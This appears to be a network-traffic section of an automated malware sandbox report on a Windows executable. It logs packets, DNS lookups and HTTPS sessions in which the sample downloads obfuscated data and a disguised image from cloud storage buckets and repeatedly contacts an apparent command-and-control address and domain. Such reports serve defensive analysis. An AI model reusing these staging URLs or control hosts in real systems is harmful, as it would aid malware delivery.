                                                                                      Jan 9, 2025 01:54:45.910293102 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.910343885 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.914484978 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.914546013 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.916836023 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.916910887 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.921432018 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.921489954 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.923783064 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.923866987 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.928430080 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.928556919 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.930823088 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.930893898 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.935529947 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.935594082 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.937874079 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.937937975 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.940130949 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.940208912 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.944977045 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.945045948 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.947098970 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.947151899 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.951865911 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.951997995 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.954189062 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.954257011 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.956490040 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.956548929 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.961143970 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.961196899 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.963624954 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.963677883 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.968290091 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.968350887 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.970583916 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.970634937 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.973032951 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.973088980 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.977516890 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.977571964 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.979895115 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.979949951 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.984602928 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.984678030 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.986957073 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.987013102 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.991615057 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.991672993 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.993958950 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.994013071 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:45.996179104 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:45.996253967 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.000840902 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.000900030 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.003256083 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.003318071 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.007869005 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.007925034 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.010304928 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.010358095 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.012618065 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.012675047 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.017371893 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.017431974 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.019676924 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.019731045 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.024265051 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.024328947 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.026608944 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.026696920 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.029036999 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.029097080 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.034018993 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.034081936 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.035964966 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.036026001 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.040563107 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.040621042 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.042953968 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.043008089 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.047683001 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.047754049 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.049959898 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.050012112 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.052247047 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.052300930 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.057008028 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.057064056 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.059463978 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.059514999 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.064002037 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.064059973 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.066382885 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.066440105 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.177242041 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.177324057 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.178211927 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.178267956 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.182502031 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.182568073 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.184757948 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.184837103 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.188975096 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.189059019 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.191147089 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.191212893 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.193161964 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.193221092 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.197475910 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.197530985 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.199712038 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.199774027 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.201801062 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.201859951 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.201869965 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.201893091 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.201914072 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.201957941 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.203527927 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.203541040 CET44350015118.178.60.9192.168.2.4
                                                                                      Jan 9, 2025 01:54:46.203569889 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:46.203591108 CET50015443192.168.2.4118.178.60.9
                                                                                      Jan 9, 2025 01:54:50.863708019 CET500178917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:50.868557930 CET89175001747.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:54:50.868679047 CET500178917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:52.568223000 CET500178917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:52.573076963 CET89175001747.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:54:52.903289080 CET89175001747.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:54:52.903337002 CET500178917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:52.903430939 CET500178917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:53.707271099 CET500188917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:53.712125063 CET89175001847.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:54:53.712198973 CET500188917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:54.716579914 CET500188917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:54.721498966 CET89175001847.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:54:55.812215090 CET89175001847.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:54:55.812284946 CET500188917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:55.812362909 CET500188917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:56.483928919 CET500198917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:56.489070892 CET89175001947.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:54:56.491786957 CET500198917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:56.812545061 CET500198917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:56.817367077 CET89175001947.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:54:58.552385092 CET89175001947.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:54:58.552445889 CET500198917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:58.552556038 CET500198917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:59.235717058 CET500208917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:59.240585089 CET89175002047.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:54:59.240669012 CET500208917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:59.807838917 CET500208917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:54:59.812748909 CET89175002047.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:01.304872990 CET89175002047.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:01.305735111 CET500208917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:01.305902004 CET500208917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:02.207006931 CET500218917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:02.211962938 CET89175002147.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:02.212064028 CET500218917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:02.654023886 CET500218917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:02.658817053 CET89175002147.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:04.250138998 CET89175002147.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:04.250374079 CET500218917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:04.250422955 CET500218917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:05.162630081 CET500228917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:05.167495966 CET89175002247.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:05.167589903 CET500228917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:05.576829910 CET500228917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:05.581576109 CET89175002247.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:07.228446960 CET89175002247.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:07.228776932 CET500228917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:07.228776932 CET500228917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:07.979331017 CET500238917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:07.984244108 CET89175002347.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:07.984412909 CET500238917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:08.482855082 CET500238917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:08.487700939 CET89175002347.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:10.053891897 CET89175002347.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:10.053987026 CET500238917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:10.054079056 CET500238917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:10.911056995 CET500248917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:10.915880919 CET89175002447.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:10.915963888 CET500248917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:11.587778091 CET500248917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:11.592607021 CET89175002447.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:12.974523067 CET89175002447.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:12.974603891 CET500248917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:12.974802971 CET500248917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:14.039098024 CET500258917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:14.043884993 CET89175002547.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:14.043958902 CET500258917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:14.634356022 CET500258917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:14.639317989 CET89175002547.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:16.099894047 CET89175002547.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:16.100177050 CET500258917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:16.100878954 CET500258917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:17.418425083 CET500268917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:17.423259020 CET89175002647.243.243.58192.168.2.4
                                                                                      Jan 9, 2025 01:55:17.423362017 CET500268917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:17.534847021 CET500268917192.168.2.447.243.243.58
                                                                                      Jan 9, 2025 01:55:17.539724112 CET89175002647.243.243.58192.168.2.4

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 9, 2025 01:52:51.740251064 CET5763953192.168.2.41.1.1.1
                                                                                      Jan 9, 2025 01:52:52.015211105 CET53576391.1.1.1192.168.2.4
                                                                                      Jan 9, 2025 01:54:13.155464888 CET6363053192.168.2.41.1.1.1
                                                                                      Jan 9, 2025 01:54:14.168240070 CET6363053192.168.2.41.1.1.1
                                                                                      Jan 9, 2025 01:54:14.426925898 CET53636301.1.1.1192.168.2.4
                                                                                      Jan 9, 2025 01:54:14.429665089 CET53636301.1.1.1192.168.2.4
                                                                                      Jan 9, 2025 01:54:49.897428036 CET5307153192.168.2.41.1.1.1
                                                                                      Jan 9, 2025 01:54:49.907218933 CET53530711.1.1.1192.168.2.4
                                                                                      Jan 9, 2025 01:54:55.934403896 CET6278553192.168.2.41.1.1.1
                                                                                      Jan 9, 2025 01:54:55.943255901 CET53627851.1.1.1192.168.2.4
                                                                                      Jan 9, 2025 01:55:01.967978001 CET5431553192.168.2.41.1.1.1
                                                                                      Jan 9, 2025 01:55:01.977581978 CET53543151.1.1.1192.168.2.4
                                                                                      Jan 9, 2025 01:55:08.172561884 CET6129253192.168.2.41.1.1.1
                                                                                      Jan 9, 2025 01:55:08.182514906 CET53612921.1.1.1192.168.2.4
                                                                                      Jan 9, 2025 01:55:14.208087921 CET5888353192.168.2.41.1.1.1
                                                                                      Jan 9, 2025 01:55:14.217396975 CET53588831.1.1.1192.168.2.4

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Jan 9, 2025 01:52:51.740251064 CET192.168.2.41.1.1.10x6ccbStandard query (0)a8mw1y.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 01:54:13.155464888 CET192.168.2.41.1.1.10x1fccStandard query (0)22mm.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 01:54:14.168240070 CET192.168.2.41.1.1.10x1fccStandard query (0)22mm.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 01:54:49.897428036 CET192.168.2.41.1.1.10xd06fStandard query (0)qsuula.netA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 01:54:55.934403896 CET192.168.2.41.1.1.10xd80aStandard query (0)qsuula.netA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 01:55:01.967978001 CET192.168.2.41.1.1.10xb1acStandard query (0)qsuula.netA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 01:55:08.172561884 CET192.168.2.41.1.1.10xb78dStandard query (0)qsuula.netA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 01:55:14.208087921 CET192.168.2.41.1.1.10x7778Standard query (0)qsuula.netA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Jan 9, 2025 01:52:52.015211105 CET1.1.1.1192.168.2.40x6ccbNo error (0)a8mw1y.oss-cn-beijing.aliyuncs.com59.110.190.44A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 01:54:14.426925898 CET1.1.1.1192.168.2.40x1fccNo error (0)22mm.oss-cn-hangzhou.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 01:54:14.426925898 CET1.1.1.1192.168.2.40x1fccNo error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 01:54:14.426925898 CET1.1.1.1192.168.2.40x1fccNo error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.9A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 01:54:14.429665089 CET1.1.1.1192.168.2.40x1fccNo error (0)22mm.oss-cn-hangzhou.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 01:54:14.429665089 CET1.1.1.1192.168.2.40x1fccNo error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 9, 2025 01:54:14.429665089 CET1.1.1.1192.168.2.40x1fccNo error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.9A (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 01:54:49.907218933 CET1.1.1.1192.168.2.40xd06fName error (3)qsuula.netnonenoneA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 01:54:55.943255901 CET1.1.1.1192.168.2.40xd80aName error (3)qsuula.netnonenoneA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 01:55:01.977581978 CET1.1.1.1192.168.2.40xb1acName error (3)qsuula.netnonenoneA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 01:55:08.182514906 CET1.1.1.1192.168.2.40xb78dName error (3)qsuula.netnonenoneA (IP address)IN (0x0001)false
                                                                                      Jan 9, 2025 01:55:14.217396975 CET1.1.1.1192.168.2.40x7778Name error (3)qsuula.netnonenoneA (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • a8mw1y.oss-cn-beijing.aliyuncs.com
                                                                                      • 22mm.oss-cn-hangzhou.aliyuncs.com

                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.44973659.110.190.444437572C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 00:52:53 UTC111OUTGET /i.dat HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                                                                      Cache-Control: no-cache
                                                                                      2025-01-09 00:52:53 UTC557INHTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:52:53 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 512
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1DE56BDBB734395F57D8
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "C3BE870A726F627202B33B6AAD385CC2"
                                                                                      Last-Modified: Wed, 08 Jan 2025 11:05:12 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 253241388760715353
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000113
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: w76HCnJvYnICsztqrThcwg==
                                                                                      x-oss-server-time: 25
                                                                                      2025-01-09 00:52:53 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 51 08 5d 47 76 3e 69 28 5b 5b 05 4b 25 66 29 2e 47 44 47 40 27 6e 21 2c 45 55 59 42 21 31 6c 21 4e 4c 0e 40 6e 27 29 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 4e 52 52 56 25 6c 79 79 18 41 14 0e 3f 77 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 52 0b 5e 44 75 3d 6a 2b 58 58 06 48 26 65 2a 2d 44 47 44 43 24 6d 22 2f 46 56 5a 41 22 32 6f 22 4d 4f 0d 41 6f 26 28 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 4f 53 53 57 24 6d 78 78 19 40 15 0f 3e 76 21
                                                                                      Data Ascii: l%00Q]Gv>i([[K%f).GDG@'n!,EUYB!1l!NL@n')&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyA?w aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33R^Du=j+XXH&e*-DGDC$m"/FVZA"2o"MOAo&('''''''''''''''''''''''''''''''''OSSW$mxx@>v!


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.44973759.110.190.444437572C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 00:52:55 UTC111OUTGET /a.gif HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                                                                      Cache-Control: no-cache
                                                                                      2025-01-09 00:52:55 UTC546INHTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:52:55 GMT
                                                                                      Content-Type: image/gif
                                                                                      Content-Length: 135589
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1DE70BFF4B3139771C80
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                                                                      Last-Modified: Wed, 08 Jan 2025 11:04:16 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 8642451798640735006
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000104
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                                                                      x-oss-server-time: 13
                                                                                      2025-01-09 00:52:55 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                      Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
